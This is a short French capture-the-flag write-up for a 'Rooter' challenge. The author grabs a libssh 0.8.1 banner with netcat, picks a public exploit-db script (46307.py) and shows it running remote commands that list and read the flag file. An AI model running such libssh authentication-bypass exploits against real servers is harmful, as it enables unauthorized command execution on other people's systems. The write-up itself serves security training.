# Challenge: Rooter | 300

>	*51.91.120.156*

>	*30000*


On voit une adresse et port. On tente un netcat rapide ;)

```
izzy@403forbidden:~/Documents/Hackerlab$ nc 51.91.120.156 30000
SSH-2.0-libssh_0.8.1

Bye Bye
```
Wow interessant on obtient la version de ssh qui tourne sur la machine distante.
Le reflexe était de chercher des exploits touchant libssh. Nous nous rendîmes sur https://www.exploit-db.com/ puis cherchâmes libssh
![](https://bitbucket.org/ben_tby/hackerlab2019-write-up-403-forbidden/downloads/Libssh.png)

Le [premier](https://bitbucket.org/ben_tby/hackerlab2019-write-up-403-forbidden/downloads/46307.py) a bien l'air plus interressant. Il fût choisit pour faire le job. 

```
izzy@403forbidden:~/Documents/Hackerlab$ python3 46307.py 51.91.120.156 30000 "ls |grep flag"

flag.txt

izzy@403forbidden:~/Documents/Hackerlab$ python3 46307.py 51.91.120.156 30000 "cat flag.txt"
CTF_SSH_Exploiter
```

# Flag: CTF_SSH_Exploiter